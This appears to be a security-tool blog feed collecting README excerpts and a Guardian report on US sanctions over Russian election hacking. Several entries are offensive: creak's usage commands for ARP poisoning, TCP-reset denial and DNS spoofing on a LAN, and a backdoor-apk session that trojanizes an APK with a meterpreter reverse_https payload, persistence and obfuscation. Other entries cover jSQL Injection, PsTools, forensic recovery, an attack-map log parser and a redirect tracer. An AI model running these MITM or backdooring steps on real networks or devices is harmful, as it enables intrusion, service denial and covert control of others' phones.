Monday, January 2, 2017

Poison, Reset, Spoof, Redirect MITM Script - creak



Performs some of the most famous MITM attacks on target addresses located in a local network. Among these, it denies navigation and download capabilities to a target host in the local network by performing an ARP poisoning attack and sending TCP reset packets in response to every request made to the router. Born as a didactic project for learning the Python language; I decline every responsibility for any abuse, including malevolent or illegal use of this code.

Installation
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
Or simply clone the repository and run creak.py after all requirements are installed:
$ git clone https://github.com/codepr/creak.git
The pcap libraries are required for raw packet manipulation, along with the dpkt module. The DNS spoofing options also require the dnet module from the libdnet package; do not confuse it with the pydnet (network evaluation tool) module. scapy can be used instead if desired, by setting it in the config.py file.

Options
Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150), can be specified multiple times
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example
Most basic usage: Deny all traffic to the target host
$ python creak.py -t 192.168.1.30 wlan0
Set a different gateway:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Set a different mac address for the device:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
Spoof mac address generating a fake one:
$ python creak.py -x -t 192.168.1.30 wlan0
Spoof mac address generating one based on manufacturer (e.g. Xeros):
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz (e.g. localhost):
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Deny multiple hosts in the subnet:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0




Sunday, January 1, 2017

Obama expels 35 Russian diplomats in retaliation for US election hacking



The Obama administration on Thursday announced its retaliation for Russian efforts to interfere with the US presidential election, ordering sweeping new sanctions that included the expulsion of 35 Russians.

US intelligence services believe Russia ordered cyber-attacks on the Democratic National Committee (DNC), Hillary Clinton’s campaign and other political organizations, in an attempt to influence the election in favor of the Republican candidate, Donald Trump.

In a statement issued two weeks after the president said he would respond to cyber-attacks by Moscow “at a time and place of our choosing”, Obama said Americans should “be alarmed by Russia’s actions” and pledged further action. 


“I have issued an executive order that provides additional authority for responding to certain cyber activity that seeks to interfere with or undermine our election processes and institutions, or those of our allies or partners,” Obama said in the statement, released while he was vacationing with his family in Hawaii.

“Using this new authority, I have sanctioned nine entities and individuals: the GRU and the FSB, two Russian intelligence services; four individual officers of the GRU; and three companies that provided material support to the GRU’s cyber operations.

“In addition, the secretary of the treasury is designating two Russian individuals for using cyber-enabled means to cause misappropriation of funds and personal identifying information.” He also announced the closure of two Russian compounds in the US.

Obama added that more actions would be taken, “some of which will not be publicized”.

On Thursday, Trump, who has previously dismissed reports of Russian interference in the election, said in a statement: “It’s time for our country to move on to bigger and better things.”

He added, however, that “in the interest of our country and its great people, I will meet with leaders of the intelligence community next week in order to be updated on the facts of this situation.”

In a conference call with reporters, senior White House officials said the president-elect’s transition team was informed of the sanctions before they were announced on Thursday. Trump and Obama spoke on Wednesday, they said.

The officials added that the actions were a necessary response to “very disturbing Russian threats to US national security”.

“There has to be a cost and a consequence for what Russia has done,” a senior administration official said. “It is an extraordinary step for them to interfere in the democratic process here in the United States of America. There needs to be a price for that.”

In Moscow, a Putin spokesman said Russia regretted the new sanctions and would consider retaliatory measures.

Diplomatic expulsions are normally met with exactly reciprocal action. In this case, however, Moscow may pause for thought. With Trump, who has spoken positively about Russia and Vladimir Putin, just three weeks away from the White House, Russia may feel it is inadvisable to kick out 35 US diplomats.

However, Russian authorities on Thursday ordered the Anglo-American School of Moscow closed, according to CNN, citing a US official briefed on the matter. The school serves children of US, British and Canadian embassy personnel, and its closure would effectively make a Russian posting difficult for US diplomats with families.

Konstantin Kosachyov, chairman of the international affairs committee in the upper house of the Russian parliament, was quoted by the RIA news agency as saying the US move represented “the death throes of political corpses”.

The Twitter feed of the Russian embassy in London, meanwhile, called the Obama administration “hapless” and attached a picture of a duck with the word “LAME” emblazoned across it.


On the White House call, officials were asked about the prospect of Trump overturning the sanctions. They acknowledged that a future president could reverse course but warned against such an “inadvisable” step.

“We have no reason to believe that Russia’s activities will cease,” a senior official said. “One reason why I think it is necessary to sustain these actions is because there’s every reason to believe Russia will interfere with future US elections.”

On Capitol Hill, Democrats applauded the president’s action, called for further measures and emphasized bipartisan support for a thorough investigation into Russian hacking.

“I hope the incoming Trump administration, which has been far too close to Russia throughout the campaign and transition, won’t think for one second about weakening these new sanctions or our existing regime,” incoming Senate minority leader Chuck Schumer said in a statement.

“Both parties ought to be united in standing up to Russian interference in our elections, to their cyber attacks, their illegal annexation of Crimea and other extra-legal interventions.”

Ben Cardin, the top Democrat on the Senate foreign relations committee, called for further sanctions from the new Congress when it convenes in January.

GOP leaders were quick to frame the new sanctions as too little, too late.

“While today’s action by the administration is overdue,” House speaker Paul Ryan said in a statement, “it is an appropriate way to end eight years of failed policy with Russia. And it serves as a prime example of this administration’s ineffective foreign policy that has left America weaker in the eyes of the world.”

Republican senators John McCain and Lindsey Graham, two of Russia’s fiercest critics, echoed Ryan but also called for tough Congressional sanctions.

“Ultimately, [the sanctions] are a small price for Russia to pay for its brazen attack on American democracy,” the two men said in a joint statement. “We intend to lead the effort in the new Congress to impose stronger sanctions on Russia.”


The 35 Russian diplomats being expelled are “intelligence operatives”, Obama said. The state department has declared them “persona non grata” and they will be given 72 hours to leave the country.

Starting on Friday at noon, the White House said, Russia will be denied access to compounds in Maryland and New York that have been used for intelligence-related purposes.

A statement from the state department said the diplomatic expulsions were a response not only to hacking but to “a pattern of harassment of our diplomats overseas, that has increased over the last four years, including a significant increase in the last 12 months”.

The statement said the harassment has included “arbitrary police stops, physical assault, and the broadcast on state TV of personal details about our personnel that put them at risk”.

For some time, US diplomats in Russia have anecdotally reported being followed and harassed by police.

In June, a US diplomat was wrestled to the ground by a policeman as he scrambled to get inside the embassy. Russian authorities said the man was a CIA agent operating under diplomatic cover.


Source: theguardian

Java application for automatic SQL database injection - jSQL Injection v0.77




jSQL Injection is a lightweight application used to find database information from a distant server.
It is free, open source and cross-platform (Windows, Linux, Mac OS X).
jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux.

Installation
Install Java, then download the latest release of jSQL and double-click on the .jar to launch the software.
You can also type java -jar jsql-injection-v0.77.jar in your terminal to start the program.


Roadmap

WAF tamper, HTTP Auth Bruteforce, Translation, SOAP injection, Command line interface, Databases: Access Cassandra MongoDb and Neo4j

Change log

v0.76 Czech translation, 17 Database flavors: SQLite
v0.75 URI injection point, Mavenify, Upgrade to Java 7, Optimized UI
v0.73 Authentication: Basic Digest Negotiate NTLM and Kerberos, Database flavor selection
v0.7 Scan multiple URLs, Github Issue reporter, 16 Database flavors: Cubrid Derby H2 HSQLDB MariaDB and Teradata, Optimized UI
alpha-v0.6 Speed x2: No hex encoding, 10 Database flavors: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb and Sybase, JUnit tests, Log4j, Translation
0.5 SQL Shell, Uploader
0.4 Admin page, Hash bruteforce like MD5 and MySQL, Text encoder/decoder like Base64, Hex and MD5
0.3 File injection, Web Shell, Integrated terminal, Configuration backup, Update checker
0.2 Algorithm Time, Multi-thread control: Start Pause Resume and Stop, Log URL calls
0.0-0.1 Method GET POST Header and Cookie, Algorithm Normal Error and Blind, Best algorithm selection, Progression bars, Simple evasion, Proxy settings, MySQL only






Utilities for listing the processes running on remote computers, running processes remotely, rebooting computers, and more - PsTools



The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.


Introduction 

 The Windows NT and Windows 2000 Resource Kits come with a number of command-line tools that help you administer your Windows NT/2K systems. Over time, I've grown a collection of similar tools, including some not included in the Resource Kits. What sets these tools apart is that they all allow you to manage remote systems as well as the local one. The first tool in the suite was PsList, a tool that lets you view detailed information about processes, and the suite is continually growing. The "Ps" prefix in PsList relates to the fact that the standard UNIX process listing command-line tool is named "ps", so I've adopted this prefix for all the tools in order to tie them together into a suite of tools named PsTools.
Note: some anti-virus scanners report that one or more of the tools are infected with a "remote admin" virus. None of the PsTools contain viruses, but they have been used by viruses, which is why they trigger virus notifications.
The tools included in the PsTools suite, which are downloadable as a package, are:
  • PsExec - execute processes remotely
  • PsFile - shows files opened remotely
  • PsGetSid - display the SID of a computer or a user
  • PsInfo - list information about a system
  • PsPing - measure network performance
  • PsKill - kill processes by name or process ID
  • PsList - list detailed information about processes
  • PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
  • PsLogList - dump event log records
  • PsPasswd - changes account passwords
  • PsService - view and control services
  • PsShutdown - shuts down and optionally reboots a computer
  • PsSuspend - suspends processes
  • PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)
The PsTools download package includes an HTML help file with complete usage information for all the tools.



Saturday, December 31, 2016

A Tool For Forensic File System Reconstruction - RecuperaBit




Software that attempts to reconstruct file system structures and recover files. Currently it supports only NTFS.

RecuperaBit attempts reconstruction of the directory structure regardless of:
  • missing partition table
  • unknown partition boundaries
  • partially-overwritten metadata
  • quick format


You can get more information about the reconstruction algorithms and the architecture used in RecuperaBit by reading my MSc thesis or checking out the slides.

Usage
usage: main.py [-h] [-s SAVEFILE] [-w] [-o OUTPUTDIR] path

Reconstruct the directory structure of possibly damaged filesystems.

positional arguments:
  path                  path to the disk image

optional arguments:
  -h, --help            show this help message and exit
  -s SAVEFILE, --savefile SAVEFILE
                        path of the scan save file
  -w, --overwrite       force overwrite of the save file
  -o OUTPUTDIR, --outputdir OUTPUTDIR
                        directory for restored contents and output files
The main argument is the path to a bitstream image of a disk or partition. RecuperaBit automatically determines the sectors from which partitions start.

RecuperaBit does not modify the disk image; however, it does read some parts of it multiple times during execution. It should also work on real devices, such as /dev/sda, but this is not advised.
Optionally, a save file can be specified with -s. The first time, after the scanning process, results are saved in the file. After the first run, the file is read to only analyze interesting sectors and speed up the loading phase.

Overwriting the save file can be forced with -w.

RecuperaBit includes a small command line that allows the user to recover files and export the contents of a partition in CSV or body file format. These are exported in the directory specified by -o (or recuperabit_output).

Pypy
RecuperaBit can be run with the standard cPython implementation, however speed can be increased by using it with the Pypy interpreter and JIT compiler:
pypy main.py /path/to/disk.img

Recovery of File Contents
Files can be restored one at a time or recursively, starting from a directory. After the scanning process has completed, you can check the list of partitions that can be recovered by issuing the following command at the prompt:
recoverable

Each line shows information about a partition. Let's consider the following output example:
Partition #0 -> Partition (NTFS, 15.00 MB, 11 files, Recoverable, Offset: 2048, Offset (b): 1048576, Sec/Clus: 8, MFT offset: 2080, MFT mirror offset: 17400)
If you want to recover files starting from a specific directory, you can either print the tree on screen with the tree command (very verbose for large drives) or you can export a CSV list of files (see help for details).

If you would rather extract all files from the Root and the Lost Files nodes, you need to know the identifier for the root directory, which depends on the file system type. The following are those of the file systems supported by RecuperaBit:
File System Type    Root Id
NTFS                5

The id for Lost Files is -1 for every file system.

Therefore, to restore Partition #0 in our example, you need to run:
restore 0 5
restore 0 -1
The files will be saved inside the output directory specified by -o.
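The geometry printed in the sample "Partition #0" line (Offset 2048, Sec/Clus 8, MFT offset 2080, MFT mirror offset 17400) can be derived from an NTFS boot sector or from its backup copy. The following is an added example, not RecuperaBit's code: it scans a constructed image for boot sectors and still locates the partition after the primary boot sector is wiped. The image contents, the 30719-sector volume size, the cluster numbers 4 and 1919 and all function names are assumptions chosen to reproduce the figures above.

```python
import struct

SECTOR = 512
OEM_ID = b"NTFS    "

def boot_sector(spc, total, mft_lcn, mirr_lcn):
    """Constructed NTFS boot sector; only the fields read below are set."""
    bs = bytearray(SECTOR)
    bs[3:11] = OEM_ID
    struct.pack_into("<HB", bs, 0x0B, SECTOR, spc)   # bytes/sector, sectors/cluster
    struct.pack_into("<QQQ", bs, 0x28, total, mft_lcn, mirr_lcn)
    bs[510:512] = b"\x55\xaa"
    return bytes(bs)

def sample_image(start=2048, spc=8, total=30719, mft_lcn=4, mirr_lcn=1919):
    """Constructed image: boot sector, backup copy after the volume, MFT stubs."""
    img = bytearray((start + total + 1) * SECTOR)
    bs = boot_sector(spc, total, mft_lcn, mirr_lcn)
    for sec in (start, start + total):               # primary and backup copies
        img[sec * SECTOR:(sec + 1) * SECTOR] = bs
    for lcn in (mft_lcn, mirr_lcn):
        off = (start + lcn * spc) * SECTOR
        img[off:off + 4] = b"FILE"                   # MFT record magic
    return img

def find_ntfs(image):
    """Scan every sector for NTFS boot sectors and derive partition geometry."""
    found = {}
    for sec in range(len(image) // SECTOR):
        raw = image[sec * SECTOR:(sec + 1) * SECTOR]
        if raw[3:11] != OEM_ID or raw[510:512] != b"\x55\xaa":
            continue
        bps, spc = struct.unpack_from("<HB", raw, 0x0B)
        total, mft_lcn, mirr_lcn = struct.unpack_from("<QQQ", raw, 0x28)
        if bps != SECTOR or spc == 0 or spc & (spc - 1):
            continue                                 # implausible geometry
        # The hit may be the primary copy (partition start) or the backup
        # stored right after the volume; keep the reading whose MFT exists.
        for start, role in ((sec, "primary"), (sec - total, "backup")):
            mft = start + mft_lcn * spc
            if start < 0 or image[mft * SECTOR:mft * SECTOR + 4] != b"FILE":
                continue
            part = found.setdefault(start, {
                "offset": start,
                "offset_bytes": start * SECTOR,
                "sec_per_clus": spc,
                "mft_offset": mft,
                "mft_mirror_offset": start + mirr_lcn * spc,
                "seen_as": [],
            })
            part["seen_as"].append(role)
            break
    return list(found.values())

if __name__ == "__main__":
    img = sample_image()
    print(find_ntfs(img))
    img[2048 * SECTOR:2049 * SECTOR] = bytes(SECTOR)  # simulate an overwritten boot sector
    print(find_ntfs(img))
```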



Thursday, December 22, 2016

shell script that simplifies the process of adding a backdoor to any Android APK file - backdoor-apk



backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Usage:
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie

[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#
The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc



Monday, December 19, 2016

Linux Command Line - Cheat Sheet




By OffSec

Tuesday, December 13, 2016

Cyber Security GeoIP Attack Map Visualization - geoip-attack-map




This geoip attack map visualizer was developed to display network attacks on your organization in real time. The data server follows a syslog file, and parses out source IP, destination IP, source port, and destination port. Protocols are determined via common ports, and the visualizations vary in color based on protocol type. This project would not be possible if it weren't for Sam Cappella, who created a cyber defense competition network traffic visualizer for the 2015 Palmetto Cyber Defense Competition. I mainly used his code as a reference, but I did borrow a few functions while creating the display server, and visual aspects of the webapp. I would also like to give special thanks to Dylan Madisetti for giving me advice about certain aspects of my implementation.


Important
This program relies entirely on syslog, and because all appliances format logs differently, you will need to customize the log parsing function(s). If your organization uses a security information and event management system (SIEM), it can probably normalize logs to save you a ton of time writing regex.
  1. Send all syslog to SIEM.
  2. Use SIEM to normalize logs.
  3. Send normalized logs to the box (any Linux machine running syslog-ng will work) running this software so the data server can parse them.

Installation
Run the following commands to install all required dependencies (tested on Ubuntu 14.04 x64)
# sudo apt-get install python3-pip redis-server
# sudo pip3 install tornado tornado-redis redis maxminddb

Setup
  1. Make sure in /etc/redis/redis.conf to change bind 127.0.0.1 to bind 0.0.0.0 if you plan on running the DataServer on a different machine than the AttackMapServer.
  2. Make sure that the WebSocket address in /AttackMapServer/index.html points back to the IP address of the AttackMapServer so the browser knows the address of the WebSocket.
  3. Download the MaxMind GeoLite2 database, and change the db_path variable in DataServer.py to wherever you store the database.
    • ./db-dl.sh
  4. Add headquarters latitude/longitude to hqLatLng variable in index.html
  5. Use syslog-gen.sh to simulate dummy traffic "out of the box."
  6. IMPORTANT: Remember, this code will only run correctly in a production environment after personalizing the parsing functions. The default parsing function is only written to parse ./syslog-gen.sh traffic.
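As an illustration of the kind of parsing function that has to be personalized, the added example below (not the project's own code) extracts source IP, destination IP, source port and destination port from a log line and labels the protocol by destination port. The iptables-style key=value format, the port table, the function names and the sample lines are assumptions constructed for this example.

```python
import ipaddress
import re
from collections import Counter

# Assumed input: iptables-style key=value lines (SRC=, DST=, SPT=, DPT=).
# Adapt the expression to what your SIEM or appliance actually emits.
LINE_RE = re.compile(
    r"\bSRC=(?P<src>\S+)\s+DST=(?P<dst>\S+)\s.*?"
    r"\bSPT=(?P<spt>\d{1,5})\s+DPT=(?P<dpt>\d{1,5})\b"
)

# Illustrative port-to-protocol table, not the project's list.
COMMON_PORTS = {22: "SSH", 23: "TELNET", 25: "SMTP", 53: "DNS",
                80: "HTTP", 443: "HTTPS", 445: "SMB", 3389: "RDP"}

def parse_line(line):
    """Return the event fields as a dict, or None if the line is unusable."""
    m = LINE_RE.search(line)
    if not m:
        return None
    try:
        # Log content is influenced by remote hosts: validate, never trust.
        src = ipaddress.ip_address(m["src"])
        dst = ipaddress.ip_address(m["dst"])
    except ValueError:
        return None
    sport, dport = int(m["spt"]), int(m["dpt"])
    if max(sport, dport) > 65535:
        return None
    return {
        "src_ip": str(src),
        "dst_ip": str(dst),
        "src_port": sport,
        "dst_port": dport,
        "protocol": COMMON_PORTS.get(dport, "OTHER"),
    }

def summarize(lines):
    """Count events per protocol and report how many lines were rejected."""
    counts, rejected = Counter(), 0
    for line in lines:
        event = parse_line(line)
        if event is None:
            rejected += 1
        else:
            counts[event["protocol"]] += 1
    return counts, rejected

# Constructed sample lines (documentation address ranges only).
SAMPLE = [
    "Jan  2 10:00:01 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=51514 DPT=22",
    "Jan  2 10:00:02 fw kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=40022 DPT=443",
    "Jan  2 10:00:03 fw kernel: IN=eth0 OUT= SRC=2001:db8::1 DST=2001:db8::2 LEN=80 PROTO=TCP SPT=50000 DPT=8081",
    "Jan  2 10:00:04 fw kernel: IN=eth0 OUT= SRC=999.1.1.1 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=1024 DPT=80",
    "Jan  2 10:00:05 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=1024 DPT=70000",
    "Jan  2 10:00:06 fw sshd[811]: Accepted publickey for admin",
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```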




Monday, December 12, 2016

Trace URL's jumps across the rel links to obtain the last URL - Hoper



It shows all the hops that a URL you specify makes to reach its endpoint, for example when you want to see the entire trip of a URL from an email or from a URL shortener. Hoper returns all the URL redirections.

Installation
$ gem install hoper

Usage
Type in your command line:
$ hoper [url]

Development
After checking out the repo, run bin/setup to install dependencies. You can also run bin/console for an interactive prompt that will allow you to experiment.
To install this gem onto your local machine, run bundle exec rake install. To release a new version, update the version number in version.rb, and then run bundle exec rake release, which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org.
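The hop-by-hop trace described above can be sketched in Python for inspecting a shortened or emailed link without opening it in a browser. This is an added example, not Hoper's code (Hoper is a Ruby gem): trace_hops, http_fetch, the stop conditions and the example hosts are assumptions, and the redirect chains are constructed so the block runs offline.

```python
import http.client
from urllib.parse import urljoin, urlsplit

REDIRECTS = {301, 302, 303, 307, 308}

def http_fetch(url, timeout=5):
    """One HEAD request, redirects not followed; returns (status, Location)."""
    parts = urlsplit(url)
    cls = (http.client.HTTPSConnection if parts.scheme == "https"
           else http.client.HTTPConnection)
    conn = cls(parts.netloc, timeout=timeout)
    try:
        target = (parts.path or "/") + ("?" + parts.query if parts.query else "")
        conn.request("HEAD", target)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()

def trace_hops(url, fetch=http_fetch, max_hops=10):
    """Return (hops, verdict); hops is a list of (url, status) in visit order."""
    hops, seen = [], set()
    while len(hops) < max_hops:
        if urlsplit(url).scheme not in ("http", "https"):
            return hops, "non-http target: " + url
        if url in seen:
            return hops, "redirect loop at " + url
        seen.add(url)
        status, location = fetch(url)
        hops.append((url, status))
        if status not in REDIRECTS or not location:
            return hops, "final"
        url = urljoin(url, location)   # Location may be relative
    return hops, "hop limit reached"

# Constructed redirect chains standing in for real servers.
FAKE = {
    "http://sho.rt.example/a1": (301, "https://track.example/c?id=7"),
    "https://track.example/c?id=7": (302, "/landing"),
    "https://track.example/landing": (200, None),
    "http://a.example/": (302, "http://b.example/"),
    "http://b.example/": (302, "http://a.example/"),
    "http://c.example/": (302, "ftp://files.example/x"),
}

def fake_fetch(url):
    """Offline stand-in for http_fetch, backed by the table above."""
    return FAKE[url]

if __name__ == "__main__":
    for start in ("http://sho.rt.example/a1", "http://a.example/", "http://c.example/"):
        hops, verdict = trace_hops(start, fetch=fake_fetch)
        for hop_url, status in hops:
            print(status, hop_url)
        print("->", verdict)
```

Pass fetch=http_fetch (the default) to trace a live URL; HEAD is used so no response body is downloaded.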


